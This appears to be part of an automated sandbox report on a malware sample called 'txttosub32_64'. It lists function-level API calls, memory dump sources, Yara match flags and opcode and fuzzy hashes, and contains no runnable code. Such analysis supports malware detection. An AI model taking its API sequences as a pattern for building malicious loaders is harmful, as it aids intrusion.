                                                                                  • Instruction Fuzzy Hash: 550171B5905205FFDB205F988848D6BBBEDFB85365B20452EFC9A83340DB709D00CBA1
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D9833A
                                                                                  • shutdown.WS2_32(?,00000002), ref: 02D98343
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastshutdown
                                                                                  • String ID:
                                                                                  • API String ID: 1920494066-0
                                                                                  • Opcode ID: cfa0d6688e302fa41bcbeae43cc1b73e72af8a6ccd1a60c8a17ef2be35699da6
                                                                                  • Instruction ID: fe6733a0c135a72e4aeb07c951e7bba6a06553fc0a5921dead79a200e05350f5
                                                                                  • Opcode Fuzzy Hash: cfa0d6688e302fa41bcbeae43cc1b73e72af8a6ccd1a60c8a17ef2be35699da6
                                                                                  • Instruction Fuzzy Hash: 82F01772A44314CFDB24AF68D415B5AB7E5FF4A721F008919E9AA97380DB30AC10CBA1
                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
                                                                                    • Part of subcall function 004038A8: GetVersionExA.KERNEL32 ref: 004038C7
                                                                                  • HeapDestroy.KERNEL32 ref: 00403A40
                                                                                    • Part of subcall function 00403DC7: HeapAlloc.KERNEL32(00000000,00000140,00403A29,000003F8), ref: 00403DD4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocCreateDestroyVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2507506473-0
                                                                                  • Opcode ID: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
                                                                                  • Instruction ID: 5dadef9d12e489db140da5c14b34350ea54a5b880f3286d9e4ff1a1591b79aa3
                                                                                  • Opcode Fuzzy Hash: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
                                                                                  • Instruction Fuzzy Hash: 04F065707553016ADB24EF705E4676B3DD8AB80B53F10443BF541F41E0EB7C8690991A
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32 ref: 004022B4
                                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0040B898
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastLibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 3568775529-0
                                                                                  • Opcode ID: f5c16db11494aa479a12514eb170bff8df21c485582b0954e7fb47b349bea7de
                                                                                  • Instruction ID: 607556a3f87d15bf623546cc57261b1ad5821761742fc9d141e199131cf4bb7f
                                                                                  • Opcode Fuzzy Hash: f5c16db11494aa479a12514eb170bff8df21c485582b0954e7fb47b349bea7de
                                                                                  • Instruction Fuzzy Hash: 09D0C735544211FBDB048F549D497993AA4EB05740F244436B903F91D4D3B55411AA9E
                                                                                  APIs
                                                                                  • CommandLineToArgvW.SHELL32 ref: 0040B059
                                                                                  • GetLocalTime.KERNEL32(00409FA0), ref: 0040B108
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArgvCommandLineLocalTime
                                                                                  • String ID:
                                                                                  • API String ID: 561774760-0
                                                                                  • Opcode ID: efae414e139a1f671ffb9d54f018b0e127eac6d9b8fda9a2461329b2de541cc3
                                                                                  • Instruction ID: 2bce7d41da18ae38763d77172bf4c0c2923118efb4f1ddefa05edd709c3953d8
                                                                                  • Opcode Fuzzy Hash: efae414e139a1f671ffb9d54f018b0e127eac6d9b8fda9a2461329b2de541cc3
                                                                                  • Instruction Fuzzy Hash: F1C04C31458102EBC6006761AA0D01836E096493C53254037E103B90E58B7D44569B5E
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseValue
                                                                                  • String ID:
                                                                                  • API String ID: 3132538880-0
                                                                                  • Opcode ID: 85913243fa073af557180c5837f00c3667cb4237c2107fea1b19033c7403f65f
                                                                                  • Instruction ID: c0b774830d858d6e81a5b5c9d71dffd75ae5a763c801bf8f4a9816ec1f73863b
                                                                                  • Opcode Fuzzy Hash: 85913243fa073af557180c5837f00c3667cb4237c2107fea1b19033c7403f65f
                                                                                  • Instruction Fuzzy Hash: ACB09235888000EBCB064BA0EF0C5283EB1BB08301B210031E30B705F1C77A2465AB2F
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D9511E
                                                                                    • Part of subcall function 02D93D7E: htons.WS2_32(?), ref: 02D93DA2
                                                                                    • Part of subcall function 02D93D7E: htonl.WS2_32(00000000), ref: 02D93DB9
                                                                                    • Part of subcall function 02D93D7E: htonl.WS2_32(00000000), ref: 02D93DC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: htonl$H_prologhtons
                                                                                  • String ID:
                                                                                  • API String ID: 4039807196-0
                                                                                  • Opcode ID: caa9bd0907c35b6040e3f19bb4955624c7811c104a5b13b88a9f2bb539b4ce39
                                                                                  • Instruction ID: b9271461f6e916c3828d9e977e0adbac4c4f49e00f50074503f9d5be68e8604c
                                                                                  • Opcode Fuzzy Hash: caa9bd0907c35b6040e3f19bb4955624c7811c104a5b13b88a9f2bb539b4ce39
                                                                                  • Instruction Fuzzy Hash: CA812775D0424E8ECF06DFA8E040AEEBBB5EF48214F10816AE855B7340EB755A05CF75
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D9E8F9
                                                                                    • Part of subcall function 02D91A01: TlsGetValue.KERNEL32 ref: 02D91A0A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prologValue
                                                                                  • String ID:
                                                                                  • API String ID: 3700342317-0
                                                                                  • Opcode ID: e92ad204a411b272e5494182590cfdd62b44b9ca0d473ef063429437021760d6
                                                                                  • Instruction ID: d5bb85fd3f8ad9028538e9d5952ffe27e2243194c1c12cc950adc73c541161cd
                                                                                  • Opcode Fuzzy Hash: e92ad204a411b272e5494182590cfdd62b44b9ca0d473ef063429437021760d6
                                                                                  • Instruction Fuzzy Hash: CD213BB290420AAFDF00DFA8D540AEEBBF9EF49310F14411AE919A7340D771AD00CBB1
                                                                                  APIs
                                                                                  • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D933CC
                                                                                    • Part of subcall function 02D932AB: __EH_prolog.LIBCMT ref: 02D932B0
                                                                                    • Part of subcall function 02D932AB: RtlEnterCriticalSection.NTDLL(?), ref: 02D932C3
                                                                                    • Part of subcall function 02D932AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D932EF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                                  • String ID:
                                                                                  • API String ID: 1518410164-0
                                                                                  • Opcode ID: 2e2ac5098e0543198fe9814890d0ad4aadad4a8d1777617b21d4f38baeef779d
                                                                                  • Instruction ID: cacbc79bdaa1ad9cf0f84b6d23289a7f0d0839ed8401fec1becc800c5abba0cd
                                                                                  • Opcode Fuzzy Hash: 2e2ac5098e0543198fe9814890d0ad4aadad4a8d1777617b21d4f38baeef779d
                                                                                  • Instruction Fuzzy Hash: 7D012D71654606AFDB049F59D885B55BBA9FF49320F10835AF868873C0EB70ED21CBA4
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D9E489
                                                                                    • Part of subcall function 02D926DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D92706
                                                                                    • Part of subcall function 02D926DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D9272B
                                                                                    • Part of subcall function 02D926DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DB5A93), ref: 02D92738
                                                                                    • Part of subcall function 02D926DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D92778
                                                                                    • Part of subcall function 02D926DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D927D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                  • String ID:
                                                                                  • API String ID: 4293676635-0
                                                                                  • Opcode ID: 470cd6e2b42a05c78405920bea96ff879cd40b4c522149b4643396742a228a90
                                                                                  • Instruction ID: c8458589edbd237517dbc4405213d76f69164dfd0b6eaf72e5a64ec253703f5d
                                                                                  • Opcode Fuzzy Hash: 470cd6e2b42a05c78405920bea96ff879cd40b4c522149b4643396742a228a90
                                                                                  • Instruction Fuzzy Hash: 4501DCB0910B04DFC719CF0AC554986FBF5EF88300B15C6AE944A8B721E3B0EA40CFA0
                                                                                  APIs
                                                                                  • CreateFileA.KERNELBASE(18DA131B), ref: 02DFCCAE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2dca000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 4046da88ded3ae71b11d569bb7041b16db1f597950f1a30880b4a5aa18449c6a
                                                                                  • Instruction ID: 1ffb82a48afbdf5d2e18ff51c5fe4e7890667aecca2374ee302cfa9d8ac49628
                                                                                  • Opcode Fuzzy Hash: 4046da88ded3ae71b11d569bb7041b16db1f597950f1a30880b4a5aa18449c6a
                                                                                  • Instruction Fuzzy Hash: B9E052B205CB08DBD7517F19ECC56A9BBE4EB08251F52092DD6C542641E63198508A9A
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D9E268
                                                                                    • Part of subcall function 02DA3A8F: _malloc.LIBCMT ref: 02DA3AA7
                                                                                    • Part of subcall function 02D9E484: __EH_prolog.LIBCMT ref: 02D9E489
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: H_prolog$_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 4254904621-0
                                                                                  • Opcode ID: 6971c67eb31743396a4374046e4a45b41c5b0b04d2cc43206808d9366b26c3c8
                                                                                  • Instruction ID: 599590307986735a597efe8efb17abe7f3799dd37dc1a7642b8a72e926ff7264
                                                                                  • Opcode Fuzzy Hash: 6971c67eb31743396a4374046e4a45b41c5b0b04d2cc43206808d9366b26c3c8
                                                                                  • Instruction Fuzzy Hash: 2CE01D71A155059BDF5DDF54D811B7D7766DF44300F00466EB409D6740DB70DD008A55
                                                                                  APIs
                                                                                    • Part of subcall function 02DA5B9A: __getptd_noexit.LIBCMT ref: 02DA5B9B
                                                                                    • Part of subcall function 02DA5B9A: __amsg_exit.LIBCMT ref: 02DA5BA8
                                                                                    • Part of subcall function 02DA33D6: __getptd_noexit.LIBCMT ref: 02DA33DA
                                                                                    • Part of subcall function 02DA33D6: __freeptd.LIBCMT ref: 02DA33F4
                                                                                    • Part of subcall function 02DA33D6: RtlExitUserThread.NTDLL(?,00000000,?,02DA33B6,00000000), ref: 02DA33FD
                                                                                  • __XcptFilter.LIBCMT ref: 02DA33C2
                                                                                    • Part of subcall function 02DA8CD4: __getptd_noexit.LIBCMT ref: 02DA8CD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                  • String ID:
                                                                                  • API String ID: 1405322794-0
                                                                                  • Opcode ID: 7a7d3a8908960ac10ee40d412107470eeaad0c0680ebc28cd697317c154ae996
                                                                                  • Instruction ID: 79114edd9326c92ce0f2b047f0662091f7b78d278f95eb2e709103d845ff0baa
                                                                                  • Opcode Fuzzy Hash: 7a7d3a8908960ac10ee40d412107470eeaad0c0680ebc28cd697317c154ae996
                                                                                  • Instruction Fuzzy Hash: 40E0ECB1A09605DFEB08BBA1D915F6E7776EF44302F200588E5029B361DB799D40AF30
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID:
                                                                                  • API String ID: 1304948518-0
                                                                                  • Opcode ID: 781c9145b832c50a8534aa9ef713f301b64a948f803c5609907501976730bdd9
                                                                                  • Instruction ID: 9f0654ea16a341d2acaa7fd4573be46b9d8383ae195522425369cd58d05b8de3
                                                                                  • Opcode Fuzzy Hash: 781c9145b832c50a8534aa9ef713f301b64a948f803c5609907501976730bdd9
                                                                                  • Instruction Fuzzy Hash: 91D01271608257EAD3109A618904BDBBBACDB04795F64487B9007B11D0E3384545ABFF
                                                                                  APIs
                                                                                  • RegCreateKeyExA.KERNELBASE(80000002), ref: 00402502
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 4bfc1e1e972c7d115f8e7f35853f295a1406ad18d4542130705d78cfb372bdbf
                                                                                  • Instruction ID: e308415e93239e6c9dcaced77becb311827baba6cb831260bfbb20691618a33a
                                                                                  • Opcode Fuzzy Hash: 4bfc1e1e972c7d115f8e7f35853f295a1406ad18d4542130705d78cfb372bdbf
                                                                                  • Instruction Fuzzy Hash: DAD02B7014C286EFE7124F204E18A613E948703314F1001ABDBD9FA0E3E2F8045AD706
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: ManagerOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1889721586-0
                                                                                  • Opcode ID: 77754d28e8fc32b2b1d78357d8fcc8befa0bc3795cf4330fdde73d66848c74b3
                                                                                  • Instruction ID: 564e44fefdc113f31ad5adb269020a989f8ddc43d9c45fb784993cf11fcdcfb3
                                                                                  • Opcode Fuzzy Hash: 77754d28e8fc32b2b1d78357d8fcc8befa0bc3795cf4330fdde73d66848c74b3
                                                                                  • Instruction Fuzzy Hash: 0ED0C9B0549242EED7268F109A6745CBBA0EA5130573518BAD183EA0A3C3384557EF9E
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: ManagerOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1889721586-0
                                                                                  • Opcode ID: 674eb16b9791e3d70b92b5c11ef4aa8995d70745842c727fcdb9591481151998
                                                                                  • Instruction ID: d19df63a12a46608f419de5f15bc6f4787d028d9182bc0a0a8f98f62195e4084
                                                                                  • Opcode Fuzzy Hash: 674eb16b9791e3d70b92b5c11ef4aa8995d70745842c727fcdb9591481151998
                                                                                  • Instruction Fuzzy Hash: C7D0C96444E2C1AFD7128B70196A06CBFA1AA0230531608FBC182DA0A3C2684A0EA75A
                                                                                  APIs
                                                                                  • RegCloseKey.KERNELBASE(?), ref: 0040B888
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 1d72e8442025aad61413409fe67fd5c2e8925e9feb3d16edd397381e94a95963
                                                                                  • Instruction ID: 8469def661c7e93e750d7d6bf368c4975d3cb0a723e88806a4ce21b8d7de89dc
                                                                                  • Opcode Fuzzy Hash: 1d72e8442025aad61413409fe67fd5c2e8925e9feb3d16edd397381e94a95963
                                                                                  • Instruction Fuzzy Hash: 93B01231C49002E7C60837C08B0CD1A3E70EA0434032080B3FB43300E08379A012E64F
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2dca000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: 79ca526ac5cb6f916aa93456c65a392c11af940a1ffcd51531b6963653619ee8
                                                                                  • Instruction ID: e7b03e17535592575b3a02d97b533e10c994c2bf9c3958edb82120d442028f19
                                                                                  • Opcode Fuzzy Hash: 79ca526ac5cb6f916aa93456c65a392c11af940a1ffcd51531b6963653619ee8
                                                                                  • Instruction Fuzzy Hash: C631E5F250C604AFE305BF49EC91BBEF7E8EF84321F16492EE6C183640DA3558408697
                                                                                  APIs
                                                                                    • Part of subcall function 02DA1550: OpenEventA.KERNEL32(00100002,00000000,00000000,81815EB4), ref: 02DA15F0
                                                                                    • Part of subcall function 02DA1550: CloseHandle.KERNEL32(00000000), ref: 02DA1605
                                                                                    • Part of subcall function 02DA1550: ResetEvent.KERNEL32(00000000,81815EB4), ref: 02DA160F
                                                                                    • Part of subcall function 02DA1550: CloseHandle.KERNEL32(00000000,81815EB4), ref: 02DA1644
                                                                                  • TlsSetValue.KERNEL32(0000002A,?), ref: 02DA20EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventHandle$OpenResetValue
                                                                                  • String ID:
                                                                                  • API String ID: 1556185888-0
                                                                                  • Opcode ID: ccc1db0e3a1c5c0b80e390be7def9c48fcd5b1f08f521a246d72379bd9f777a8
                                                                                  • Instruction ID: 015dd806b9bc30f1ff9506bc673b780175f073589957a34e4f51893e753b80b6
                                                                                  • Opcode Fuzzy Hash: ccc1db0e3a1c5c0b80e390be7def9c48fcd5b1f08f521a246d72379bd9f777a8
                                                                                  • Instruction Fuzzy Hash: E9018F76A84204EBD710CF59DC45F9ABBB8EB05670F20476AE829D3380D771AD148AA0
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0040709C), ref: 0040B854
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 3cf17bd6c3383adaab1375757b9de2b7aa3b6394f67e237ce55123a11308cc28
                                                                                  • Instruction ID: 28639ac4491f2836728a37434a14f36d46919f90a68b679972738c8a532aa666
                                                                                  • Opcode Fuzzy Hash: 3cf17bd6c3383adaab1375757b9de2b7aa3b6394f67e237ce55123a11308cc28
                                                                                  • Instruction Fuzzy Hash: CEE0A032148200FAC7041A208D15F923A68EB54B80F614022BA09371C183B46825E5EF
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2dca000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: f03f63124b3febb2ad598fcbaeb4c8fe58c5fe0a0eb6e6176de64d547680e3eb
                                                                                  • Instruction ID: 4814673ac5f16680619108dfd46db1be7117fae5fddd67a4b78ed3e53c819c1c
                                                                                  • Opcode Fuzzy Hash: f03f63124b3febb2ad598fcbaeb4c8fe58c5fe0a0eb6e6176de64d547680e3eb
                                                                                  • Instruction Fuzzy Hash: 92D05EA249C72CCBD3113E98BC497FAF7ACAB00711F46042DCB8243740BDB0994486DB
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0040709C), ref: 0040B854
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: e7e8fbc994592ccfc0e69759baa445e67a48ec1dfc40b7918042294ae80d9df8
                                                                                  • Instruction ID: 64e721bb0db5f6f8cbdcbd0ab4d56eeb0f05ebbd001a60e5c9051e97c4713f13
                                                                                  • Opcode Fuzzy Hash: e7e8fbc994592ccfc0e69759baa445e67a48ec1dfc40b7918042294ae80d9df8
                                                                                  • Instruction Fuzzy Hash: 7BD05E77008282EFCB4627B04D08B947B30FBA4748F1A4467E003B71D58B391C25E69A
                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32 ref: 00402609
                                                                                    • Part of subcall function 004024D3: GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 0040BA92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModulelstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 2536495822-0
                                                                                  • Opcode ID: c34238a208e68e0c8d5cbf17d6f54bc694f5136ce39cbc6c8e5c731dd38bd972
                                                                                  • Instruction ID: 366d87a75d72b3010cb9a455dd07103329065d4c35e3b4761e243d6bbb6a759e
                                                                                  • Opcode Fuzzy Hash: c34238a208e68e0c8d5cbf17d6f54bc694f5136ce39cbc6c8e5c731dd38bd972
                                                                                  • Instruction Fuzzy Hash: F4C04C20644106E9D610AFE28B1C56B25689915344720847B9C13F01C2D77CD506656F
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 4bdd1da09b214a9522014b3869853c231405d4e41353c8f3d9898752e43dc433
                                                                                  • Instruction ID: 84140583e196603c19db9b1a6fde802b6f3672fb7aff7941ec11000f64e5d60a
                                                                                  • Opcode Fuzzy Hash: 4bdd1da09b214a9522014b3869853c231405d4e41353c8f3d9898752e43dc433
                                                                                  • Instruction Fuzzy Hash: 7CA00271884901FBC7054B60BF1CD64BB31B7043093160125E103604A0C77A5536EB4D
                                                                                  APIs
                                                                                  • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02DA08E2
                                                                                  • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02DA08EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorFormatLastMessage
                                                                                  • String ID:
                                                                                  • API String ID: 3479602957-0
                                                                                  • Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                                  • Instruction ID: a2f586f8c0e9bf538fad8c8127078a35c00023deb2a68c5c0bf5d4da8ed258dc
                                                                                  • Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                                  • Instruction Fuzzy Hash: 57F09A30208301CFEB24CE25C8A1F2EBBE4BB9C745F54092CF596A2291D370E581CB6A
                                                                                  APIs
